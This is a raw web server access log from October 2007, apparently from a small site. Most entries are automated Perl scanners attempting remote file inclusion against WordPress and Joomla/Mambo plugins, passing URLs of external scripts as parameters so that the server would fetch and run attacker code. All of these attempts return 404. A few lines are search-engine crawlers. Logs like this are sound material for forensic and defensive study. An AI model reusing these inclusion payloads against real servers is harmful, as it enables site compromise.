206.225.86.155 - - [12/Oct/2007:12:48:59 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
69.72.157.71 - - [12/Oct/2007:12:49:27 -0700] "GET /logs/access_070712.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.72.157.71 - - [12/Oct/2007:12:49:27 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.72.157.71 - - [12/Oct/2007:12:49:27 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
206.225.86.155 - - [12/Oct/2007:12:50:43 -0700] "GET /logs/access_070612.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
69.72.157.71 - - [12/Oct/2007:12:51:24 -0700] "GET /logs/access_070612.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.36.233.242 - - [12/Oct/2007:12:53:03 -0700] "GET /logs/access_070712.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.36.233.242 - - [12/Oct/2007:12:53:04 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.36.233.242 - - [12/Oct/2007:12:53:04 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
204.157.15.23 - - [12/Oct/2007:12:53:20 -0700] "GET /logs/access_070712.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 316 "-" "libwww-perl/5.808" "www.projectpr.com"
204.157.15.23 - - [12/Oct/2007:12:53:20 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 293 "-" "libwww-perl/5.808" "www.projectpr.com"
204.157.15.23 - - [12/Oct/2007:12:53:20 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.36.233.242 - - [12/Oct/2007:12:54:39 -0700] "GET /logs/access_070612.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
204.157.15.23 - - [12/Oct/2007:12:55:19 -0700] "GET /logs/access_070612.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.29.74.145 - - [12/Oct/2007:12:56:23 -0700] "GET /logs/access_070712.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.29.74.145 - - [12/Oct/2007:12:56:23 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.29.74.145 - - [12/Oct/2007:12:56:23 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.72.157.71 - - [12/Oct/2007:12:57:34 -0700] "GET /logs/access_070712.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.72.157.71 - - [12/Oct/2007:12:57:34 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.72.157.71 - - [12/Oct/2007:12:57:34 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.36.233.242 - - [12/Oct/2007:12:58:34 -0700] "GET /logs/access_070712.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 316 "-" "libwww-perl/5.808" "www.projectpr.com"
72.36.233.242 - - [12/Oct/2007:12:58:34 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.36.233.242 - - [12/Oct/2007:12:58:35 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.29.74.145 - - [12/Oct/2007:12:58:46 -0700] "GET /logs/access_070612.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
204.213.246.61 - - [12/Oct/2007:12:59:23 -0700] "GET /logs/access_070712.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
204.213.246.61 - - [12/Oct/2007:12:59:23 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
204.213.246.61 - - [12/Oct/2007:12:59:23 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
69.72.157.71 - - [12/Oct/2007:13:00:07 -0700] "GET /logs/access_070612.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.36.233.242 - - [12/Oct/2007:13:00:54 -0700] "GET /logs/access_070612.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
133.11.229.30 - - [12/Oct/2007:13:00:59 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://personales.ya.com/q1w2/safe.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.65" "www.projectpr.com"
204.213.246.61 - - [12/Oct/2007:13:01:16 -0700] "GET /logs/access_070612.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
86.39.130.213 - - [12/Oct/2007:13:03:04 -0700] "GET /logs/access_070512.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.onlinebusan.com/user_img/gmaw0121/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
86.39.130.213 - - [12/Oct/2007:13:03:04 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.onlinebusan.com/user_img/gmaw0121/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
86.39.130.213 - - [12/Oct/2007:13:03:05 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.onlinebusan.com/user_img/gmaw0121/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
86.39.130.213 - - [12/Oct/2007:13:03:05 -0700] "GET /logs/access_070612.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.onlinebusan.com/user_img/gmaw0121/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:13:08:46 -0700] "GET /logs/access_070512.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:13:08:46 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:13:08:47 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 286 "-" "libwww-perl/5.805" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:13:08:47 -0700] "GET /logs/access_070612.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
204.213.246.61 - - [12/Oct/2007:13:10:14 -0700] "GET /logs/access_070712.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 316 "-" "libwww-perl/5.79" "www.projectpr.com"
204.213.246.61 - - [12/Oct/2007:13:10:14 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
204.213.246.61 - - [12/Oct/2007:13:10:15 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
211.171.202.183 - - [12/Oct/2007:13:11:01 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://personales.ya.com/q1w2/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
169.207.64.5 - - [12/Oct/2007:13:11:50 -0700] "GET /logs/access_070712.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
169.207.64.5 - - [12/Oct/2007:13:11:50 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
169.207.64.5 - - [12/Oct/2007:13:11:56 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 298 "-" "libwww-perl/5.808" "www.projectpr.com"
169.207.64.5 - - [12/Oct/2007:13:13:59 -0700] "GET /logs/access_070612.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
204.213.246.61 - - [12/Oct/2007:13:14:04 -0700] "GET /logs/access_070612.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
86.39.130.213 - - [12/Oct/2007:13:17:32 -0700] "GET /logs/access_%3Cwbr%20/%3E070512.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.onlinebusan.com/user_img/gmaw0121/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
86.39.130.213 - - [12/Oct/2007:13:17:33 -0700] "GET /logs/access_%3Cwbr%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.onlinebusan.com/user_img/gmaw0121/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
86.39.130.213 - - [12/Oct/2007:13:17:33 -0700] "GET /logs/access_%3Cwbr%20/%3E070612.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.onlinebusan.com/user_img/gmaw0121/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:13:23:31 -0700] "GET /logs/access_%3Cwbr%20/%3E070512.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:13:23:31 -0700] "GET /logs/access_%3Cwbr%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:13:23:32 -0700] "GET /logs/access_%3Cwbr%20/%3E070612.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 317 "-" "libwww-perl/5.805" "www.projectpr.com"
169.207.64.5 - - [12/Oct/2007:13:25:24 -0700] "GET /logs/access_070712.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
169.207.64.5 - - [12/Oct/2007:13:25:25 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
169.207.64.5 - - [12/Oct/2007:13:25:25 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
169.207.64.5 - - [12/Oct/2007:13:29:06 -0700] "GET /logs/access_070612.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
86.39.130.213 - - [12/Oct/2007:13:32:37 -0700] "GET /logs/access_070712.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.onlinebusan.com/user_img/gmaw0121/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
86.39.130.213 - - [12/Oct/2007:13:32:37 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.onlinebusan.com/user_img/gmaw0121/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
86.39.130.213 - - [12/Oct/2007:13:32:38 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.onlinebusan.com/user_img/gmaw0121/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
211.171.202.183 - - [12/Oct/2007:13:36:01 -0700] "GET /logs/access_070712.log/components/com_simpleboard/image_upload.php?sbp=http://personales.ya.com/q1w2/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
211.171.202.183 - - [12/Oct/2007:13:36:01 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://personales.ya.com/q1w2/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:13:41:20 -0700] "GET /logs/access_070712.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:13:41:20 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:13:41:21 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
86.39.130.213 - - [12/Oct/2007:13:48:39 -0700] "GET /logs/access_070612.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.onlinebusan.com/user_img/gmaw0121/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:13:51:41 -0700] "GET /logs/access_070612.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:13:51:42 -0700] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:13:51:42 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:13:51:53 -0700] "GET /logs/access_070512.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 308 "-" "libwww-perl/5.805" "www.projectpr.com"
202.160.178.87 - - [12/Oct/2007:13:57:35 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:13:57:47 -0700] "GET /logs/access_070612.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
202.160.179.36 - - [12/Oct/2007:13:57:52 -0700] "GET / HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:14:07:51 -0700] "GET /logs/access_070612.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 308 "-" "libwww-perl/5.805" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:14:07:52 -0700] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:14:07:52 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:14:12:22 -0700] "GET /logs/access_070712.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
74.6.28.148 - - [12/Oct/2007:14:17:23 -0700] "GET /?S=A HTTP/1.0" 200 9521 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
85.214.44.127 - - [12/Oct/2007:14:20:29 -0700] "GET /!scanhttp://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.214.65.128 - - [12/Oct/2007:14:23:31 -0700] "GET /logs/access_070712.log//components/com_colorlab/admin.color.php?mosConfig_live_site=http://mandrivauser.cz/themes/.x/thejoke.txt? HTTP/1.1" 404 309 "-" "libwww-perl/5.79" "www.projectpr.com"
85.214.65.128 - - [12/Oct/2007:14:23:31 -0700] "GET //components/com_colorlab/admin.color.php?mosConfig_live_site=http://mandrivauser.cz/themes/.x/thejoke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
85.214.65.128 - - [12/Oct/2007:14:23:31 -0700] "GET /logs//components/com_colorlab/admin.color.php?mosConfig_live_site=http://mandrivauser.cz/themes/.x/thejoke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
85.214.44.127 - - [12/Oct/2007:14:28:24 -0700] "GET /logs/access_070612.log/!scanhttp://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.214.44.127 - - [12/Oct/2007:14:28:24 -0700] "GET /logs/!scanhttp://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.214.44.127 - - [12/Oct/2007:14:28:25 -0700] "GET /logs/access_070712.log/!scanhttp://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
86.39.130.213 - - [12/Oct/2007:14:30:03 -0700] "GET /logs/access_%3Cwbr%20/%3E070712.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.onlinebusan.com/user_img/gmaw0121/id.txt? HTTP/1.1" 404 317 "-" "libwww-perl/5.79" "www.projectpr.com"
86.39.130.213 - - [12/Oct/2007:14:30:03 -0700] "GET /logs/access_%3Cwbr%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.onlinebusan.com/user_img/gmaw0121/id.txt? HTTP/1.1" 404 302 "-" "libwww-perl/5.79" "www.projectpr.com"
86.39.130.213 - - [12/Oct/2007:14:37:51 -0700] "GET /logs/access_%3Cwbr%20/%3E070612.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.onlinebusan.com/user_img/gmaw0121/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
63.123.238.8 - - [12/Oct/2007:14:39:44 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma)" "www.projectpr.com"
63.123.238.8 - - [12/Oct/2007:14:39:44 -0700] "GET / HTTP/1.1" 200 9521 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma)" "www.projectpr.com"
202.123.165.206 - - [12/Oct/2007:14:42:33 -0700] "GET /logs/access_%3Cwbr%20/%3E070612.log/!scanhttp://badmus.by.ru/id.txt? HTTP/1.1" 404 313 "-" "libwww-perl/5.803" "www.projectpr.com"
202.123.165.206 - - [12/Oct/2007:14:42:34 -0700] "GET /!scanhttp://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
202.123.165.206 - - [12/Oct/2007:14:42:34 -0700] "GET /logs/access_%3Cwbr%20/!scanhttp://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
202.123.165.206 - - [12/Oct/2007:14:42:36 -0700] "GET /logs/access_%3Cwbr%20/%3E070712.log/!scanhttp://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
206.225.86.155 - - [12/Oct/2007:14:48:06 -0700] "GET /logs/access_070512.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
206.225.86.155 - - [12/Oct/2007:14:48:06 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
206.225.86.155 - - [12/Oct/2007:14:48:06 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
206.225.86.155 - - [12/Oct/2007:14:48:25 -0700] "GET /logs/access_070612.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:14:55:21 -0700] "GET /logs/access_%3Cwbr%20/%3E070712.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:14:55:22 -0700] "GET /logs/access_%3Cwbr%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 302 "-" "libwww-perl/5.805" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:15:05:06 -0700] "GET /logs/access_%3Cwbr%20/%3E070612.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:15:24:33 -0700] "GET /logs/access_070712.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 311 "-" "libwww-perl/5.805" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:15:24:34 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:15:24:34 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:15:36:40 -0700] "GET /logs/access_070612.log//components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.189.224.45 - - [12/Oct/2007:15:36:41 -0700] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.eac-finance.com/mod/eji/id.txt? HTTP/1.1" 404 285 "-" "libwww-perl/5.805" "www.projectpr.com"
